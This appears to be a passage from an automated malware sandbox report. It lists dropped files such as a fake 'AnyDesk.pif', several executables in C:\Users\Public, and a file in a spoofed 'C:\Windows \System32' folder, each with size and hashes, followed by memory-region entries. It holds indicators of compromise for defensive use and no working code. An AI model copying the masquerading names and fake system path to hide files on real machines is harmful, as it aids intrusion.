              ae29e41c01ee6620fe822f9feb3dd851617314cec4d8ef750d2ebd2c61bd24fb54012146123f1fdf9b893f26e83ce5a17dbc5d3aae42bb04daab6d42e82f2a04

            • C:\Users\Public\Libraries\AnyDesk.pif

              Filesize

              958KB

              MD5

              8666ee474e2c330ddb37bec62216abd3

              SHA1

              3b5835f1ed96bfe9ac2b027d433f8c90a1f96416

              SHA256

              fe6843e766f78bfa46190600722fe39184209adb1b1c6a2533296170e66f9a05

              SHA512

              b6a4aeeb30685fda1c6f7008ac3cd4e6a6ab171d53e890d88fa3b954eb74dd404c3c490a2413653adb74e139cd936f665e5cfd4340eaba70e24c43bfa06c692e

            • C:\Users\Public\Libraries\FX.cmd

              Filesize

              8KB

              MD5

              60cd0be570decd49e4798554639a05ae

              SHA1

              bd7bed69d9ab9a20b5263d74921c453f38477bcb

              SHA256

              ca6a6c849496453990beceef8c192d90908c0c615fa0a1d01bcd464bad6966a5

              SHA512

              ab3dbdb4ed95a0cb4072b23dd241149f48ecff8a69f16d81648e825d9d81a55954e5dd9bc46d3d7408421df30c901b9ad1385d1e70793fa8d715c86c9e800c57

            • C:\Users\Public\Libraries\doxdtthV.pif

              Filesize

              171KB

              MD5

              22331abcc9472cc9dc6f37faf333aa2c

              SHA1

              2a001c30ba79a19ceaf6a09c3567c70311760aa4

              SHA256

              bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

              SHA512

              c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

            • C:\Users\Public\alpha.exe

              Filesize

              283KB

              MD5

              8a2122e8162dbef04694b9c3e0b6cdee

              SHA1

              f1efb0fddc156e4c61c5f78a54700e4e7984d55d

              SHA256

              b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

              SHA512

              99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

            • C:\Users\Public\ger.exe

              Filesize

              75KB

              MD5

              227f63e1d9008b36bdbcc4b397780be4

              SHA1

              c0db341defa8ef40c03ed769a9001d600e0f4dae

              SHA256

              c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

              SHA512

              101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

            • C:\Users\Public\phf.exe

              Filesize

              1.6MB

              MD5

              bd8d9943a9b1def98eb83e0fa48796c2

              SHA1

              70e89852f023ab7cde0173eda1208dbb580f1e4f

              SHA256

              8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

              SHA512

              95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

            • C:\Users\Public\xkn.exe

              Filesize

              442KB

              MD5

              04029e121a0cfa5991749937dd22a1d9

              SHA1

              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

              SHA256

              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

              SHA512

              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

            • C:\Windows \System32\per.exe

              Filesize

              48KB

              MD5

              85018be1fd913656bc9ff541f017eacd

              SHA1

              26d7407931b713e0f0fa8b872feecdb3cf49065a

              SHA256

              c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

              SHA512

              3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

            • memory/1704-0-0x0000018AC0FE0000-0x0000018AC0FF0000-memory.dmp

              Filesize

              64KB

            • memory/1704-23-0x0000018AC1460000-0x0000018AC1470000-memory.dmp

              Filesize

              64KB

            • memory/4804-120-0x00000208C6130000-0x00000208C6152000-memory.dmp

              Filesize

              136KB

            • memory/4908-595-0x0000000030C20000-0x0000000030CBC000-memory.dmp

              Filesize

              624KB

            • memory/4908-594-0x000000002E410000-0x000000002E420000-memory.dmp

              Filesize

              64KB

            • memory/4908-593-0x0000000030E20000-0x00000000313C4000-memory.dmp

              Filesize

              5.6MB

            • memory/4908-597-0x00000000318D0000-0x0000000031936000-memory.dmp

              Filesize

              408KB

            • memory/4908-598-0x00000000322A0000-0x0000000032332000-memory.dmp

              Filesize

              584KB

            • memory/4908-604-0x0000000032EB0000-0x0000000032FD0000-memory.dmp

              Filesize

              1.1MB

            • memory/4908-591-0x000000002E260000-0x000000002E272000-memory.dmp

              Filesize

              72KB

            • memory/4908-605-0x0000000033020000-0x0000000033374000-memory.dmp

              Filesize

              3.3MB

            • memory/4908-609-0x00000000333C0000-0x000000003340C000-memory.dmp

              Filesize

              304KB

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.